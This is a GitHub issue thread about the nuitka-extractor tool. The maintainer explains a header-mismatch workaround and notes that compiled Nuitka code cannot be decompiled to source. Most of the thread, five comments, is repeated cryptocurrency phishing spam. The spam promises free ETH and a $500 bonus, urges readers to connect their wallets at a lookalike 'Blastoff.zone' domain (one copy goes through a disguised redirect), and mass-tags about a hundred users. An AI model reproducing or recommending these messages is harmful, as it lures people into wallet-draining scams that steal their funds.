### ISSUE TITLE
Nuitka magic header mismatch

### ISSUE THREAD

**Issue by CodeFanaticX** [extremecoders-re/nuitka-extractor#2]
I check the exe and it is packed with nuitka
I hope there's other solution?

NUITKA_ONEFILE_PARENT

```
[+] Processing test.exe
[+] File type: PE
[+] Payload size: 0 bytes
[!] Nuitka magic header mismatch
```

**Comment by extremecoders-re** [comment]
The issue is due to the manifest. Until this is fixed you can delete the manifest in a hex editor.

For this specific file, delete the last 1648 (0x670) bytes and the extractor would work.

![image](https://github.com/extremecoders-re/nuitka-extractor/assets/12072382/a07ef0c8-ec7c-4177-9af5-f2a487d92361)

```
C:\>nuitka-extractor.exe test1.exe
[+] Processing test1.exe
[+] File type: PE
[+] Payload size: 11891432 bytes
[+] Payload compression: true
[+] Beginning extraction...
[+] Total files: 43
[+] Successfully extracted to test1.exe_extracted
```
![image](https://github.com/extremecoders-re/nuitka-extractor/assets/12072382/bbd08028-929b-4411-8907-9f0295ec56c9)

![image](https://github.com/extremecoders-re/nuitka-extractor/assets/12072382/45a59034-7cba-4a4b-a907-eb46f6f3fc4d)

**Comment by alienmaster9** [comment]
[telerising-v0.11.6_x86-64_linux.zip](https://github.com/extremecoders-re/nuitka-extractor/files/14482179/telerising-v0.11.6_x86-64_linux.zip)
extract api file in this folder its not working at the moment

**Comment by extremecoders-re** [comment]
@alienmaster9 It is not a "onefile" executable. There is nothing to extract.

**Comment by alienmaster9** [comment]
but its main file it compressed by nutika can it converted to source code ???

**Comment by extremecoders-re** [comment]
@alienmaster9 Nope. Nuitka compiles python bytecode to native machine code. Recovering high level python source code from native code is extremely difficult.

**Comment by alienmaster9** [comment]
do you have telegram or decord so i cant connect with you i got some binaries need fix something and make them run

**Comment by extremecoders-re** [comment]
@alienmaster9 Contact info is in my GitHub profile

**Comment by otodak** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Dyeniz72, @hakeemullahjan, @amintajy2, @ValentinBTC, @kotrird, @Borodabass, @3m4r5, @xiashali, @Tasha-Mia, @artivilla, @Abbey151998, @SHA888, @matagus, @blablainvest, @hugo-k-m, @Annie2022, @mariyakovenko, @byrd10, @fbiiapabo3, @Ngdxjj, @AnnaStark1, @FriedWagyu, @nurkeld1, @kejianlin, @koltci, @samannavaie, @tafrihonlinewebmaster, @7778666, @Dezmoh, @phuctohuu, @alexalvit, @cryptodexbest, @Kevin-Heleodoro, @glitch003, @harryho612, @PabloCastellano, @greenapple33, @Cryptomaster178, @BittuBabu1, @Freyja13, @oszdao, @Giridharilal, @0xelfarisy, @Ariffur, @dmytroprus, @Ford14, @Lana7kh, @Alifarghol1979, @onlinetipserYt, @Canawansansanf2, @Rekha4583, @f4l1pe, @cosmosfuture, @hiteshwadhwani, @itsrachelfish, @jele7ka, @Jony6196, @Diogomartf, @Poleschuka, @lalidammhotty, @d0wnlore, @omhaisora, @3aTkHuCb, @leninin, @Hendryfan, @shainaanum, @Giaphat1983, @Pilgrim71, @SatiaLee, @ducatedxz, @andreujuanc, @cowboyedition, @gustavolaux, @sriharshasaswath, @Vpum, @angelisaiarasi, @dappconsulting, @entueradigital, @byrd999, @yenisey, @thanhthao864, @amintajy2, @Ademidun007, @Nguyenngoc0810, @neatonk, @Kryptonplanet1, @Dim2013, @Acc3ssD3n13d, @YoonA747, @chenlintiny, @fosterpari, @dalu19, @Visentes, @agrozold, @Naxsun, @JaniAnttonen, @vanthang84, @ifir3, @ghjrdf

**Comment by lindembergandrade** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Sreerag-ibtl, @milancermak, @obatirou, @eddiehazel, @taramakage, @jerod-estapa, @vvinteresting, @leovct, @suicide, @cosmix, @AgoL5866, @victorelec14, @ckoopmann, @EpicLiem, @drunaar, @Dawimpy, @atshelchin, @BasixKOR, @0xOsiris, @refl3ction, @0x1un, @kannishk, @iFrostizz, @Starflower8, @aiportal, @ncitron, @5l1v3r1, @zees-dev, @0x0elliot, @stingzheng, @shresthagrawal, @datradito, @alureon, @ntrippar, @anthonyoliai, @kolyasapphire, @JP-Ellis, @meowyx, @mnuestc, @AlexanderDickie, @ccding, @HusseinLezzaik, @melekes, @zsluedem, @ehart004, @YeeJiaWei, @izqui, @toxotguo, @ArunSankarKs, @quangkeu95BinaryBar, @arbal, @popzxc, @chirag-bgh, @developerworks, @vyhisper, @Cionn3, @canghai118, @Moataz-E, @bongkarchip070890, @ttarsi, @JussaMouse, @gulitsky, @dsbrgg, @mdhash, @psushi, @p-r-i-t-h-v-i, @jaybuidl, @skynetcap, @roessland, @sslime336, @chixiaowen, @kirkdurgwillyk, @cp-juilpark, @inaridiy, @epociask, @valo, @wiasliaw, @Kayryu, @nuts-rice, @PeakyCryptos, @sarra-f, @8272, @vahid9000, @hoangph271, @dekz, @PaulRBerg, @syphrpunk, @iayanami, @evilakela, @hzqd, @QiangL, @hinryd, @qqil, @supleed2, @syjn99, @DividesZero, @jakubgs, @maniac1122, @yokiyokx

**Comment by GTMany** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
zhulin0001, @Butynskyy, @Rangoscq, @surajj108, @montycheese, @0xMario27, @podiumdesu, @Hosseinom, @kako1357, @DIMCHERRY, @DrDen75, @SAMIZ111, @chad-js, @hroohbakhsh, @rezalakzaeii, @blackdoc111, @duleBLN, @DFA5, @ESHULSE9, @peakbolt, @pelakee13, @dadlessnsad, @medgyek, @yogiartnft, @Woasmahdi, @cheetahir, @bmasoudtc, @cryptosolutioner, @FiatPrint, @TaliaKaza, @xuan-io, @zrep1953, @bercortex, @realknown, @saeid7188, @pouyano, @BillGatesIII, @hojimxc, @maie880, @Ahmadzhd, @Chenxinjie65, @Shankusu993, @ONSENFOUEN, @drdfrink, @aytanet, @Sayfayguy, @Vadim535, @unbalancedparentheses, @naflan222, @zeuslionVhdeveth, @Swishified, @irizzzzz, @getoffers, @mostafapno, @jcurbelo, @Creative235, @ziljah, @LatifCrypto, @ALEKS5858, @Forbytex, @pokorb428, @rrm5863, @mlx72, @italoag, @haxshad, @mehmetalikuyucu, @IgorP04, @taempark, @Nazaninghnik, @liuyunsuixin, @ebihoseini, @aytamehd, @D-lyw, @davud1371, @tarhvaareh, @bahramgoz, @un9oo, @atapin, @Nikiforrovv, @nickvoronoov, @K-tabaki, @ilyasbo, @AbdelStark, @pantea1104, @ifls, @EG-easy, @delannoykurt, @josebernalte, @osmamad78, @ValeriyCrypt, @Yanatolochiy, @FredericaHart, @blackestwhite, @martinbaca1993, @nili1tomo, @iavl, @puntacana5, @pawpawya, @behnam1225

**Comment by josuecv26** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
xbj137661413, @cainiaocome, @weebi, @guangnaoke, @liu-yihong, @malymal, @AvichalChadha, @kentuckleberry, @cmdplusr, @Nightmare-Serene, @gjvandijk, @Ssunnyy, @felixlberg, @chenxiqiyuan, @wojtek2kdev, @neederhow, @SNAILTHELAZY, @longlive77, @liy05, @AsakuraMizu, @tony-xsr, @EmergentOrder, @akannke, @spalger, @thekalinga, @luda820804, @iaurg, @liesauer, @shokosanma, @alanmore231, @bgagan911, @3bf1114a986ba87e, @arbal, @goga-m, @1111Sirius1111, @ricardocostaarchm, @Erth616, @humonidtyphoon, @Jesn, @bourbakiN97, @muhammedsaid, @sulsoltanoff, @T1nFu, @jvmkit, @primus115, @enider, @esengine, @NayLinHtet4942, @Siss3l, @turtlebayjaizhengyu1992, @extremecoders-re, @dagmawibabi, @MustardseedX, @Izrab, @cowgirl6, @bigcyy, @DZL1943, @alehpineda, @podwodny, @neonalton, @h-s123, @daniodio, @PresleyHank, @s-and-t, @francisjsun, @knightop, @tulya409, @jeanbaptisteclemens, @krisl, @rkaelle, @Dginozator, @hissssst, @Heartnett, @Leslie-LIUU, @ccavxx, @molney239, @MoeruIshiki, @dnbrakk, @Shelob9, @qiugh, @ZechariahZheng, @raven4752, @weideguo, @kirollos91, @sailxjx, @kerryvernebegeman, @Cavefishy, @Yemaoxin, @mbledkowski, @ForsakenDurian, @pyronn, @GavinXF, @Teddycyber, @romainmoranges, @ClarePhang, @AlexANSO, @ahmeticat, @RtYkk, @FrankCCCCC

**Comment by n1md7** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
MikhailoPro, @sebkys, @keepyourlightson, @rezha777, @infographie35, @alexisCode50, @dipugaa1, @dhjh1024, @sunweidongdong, @CryptoBikashAirdrop, @BillyRae, @abedfele, @alboairdrop, @sonnet014, @kmni91, @0x456ff3, @newindia1, @break199, @walleehe, @Gabnasyrov, @pedrosimoes679, @efenomeno, @Reza941, @wazirr155, @Kaewnguyen, @kimanbn, @hanafi0509, @cagataygoktepe, @AnashkinK, @Vladon773, @Zeeshan-2k1, @AGRime, @Kl0x2023, @ChristianM910, @gold3son, @Burak35Smoke, @farseatrade, @chrisfyk, @rivvnansld, @ChitrakshEastman, @xx666888, @muhuo2024, @mehdi2038, @Shohidul6699, @hadbhr, @humen86, @KodockOne, @shivamk89, @ssss12315, @lanqyjohnybitcoin, @Bmunizz, @cubanmicrowave, @achamaru1, @jalahong, @changkaixuan31, @humblemee, @opensourcedigest, @txzx456, @LDavila30, @xiaofeilong66, @onderfehmi, @DanielJD1216, @xiaohuolv, @wahyudinqimimz, @hamed-mn, @starpause, @Gmetaverse, @Mooon12342, @Ayugaps, @wshuaiwong2, @Poconhub, @bockbockbock3, @0x7673, @w22py, @nbgoku, @icezaland014, @Justice-hub, @cymeow, @movieperusal, @tofiquedurrani, @fengmolly888, @PunkCrow, @redhead-sensual, @sharpela, @xulanjin, @tzedonn, @kimphatxuan1985, @StasMexico, @jonnikrich, @Suko1, @RihanaDiario, @kdivus, @Grainey, @jinna520, @tax0951, @notacoolguy, @dgam777, @WRonim, @abagaillove1314
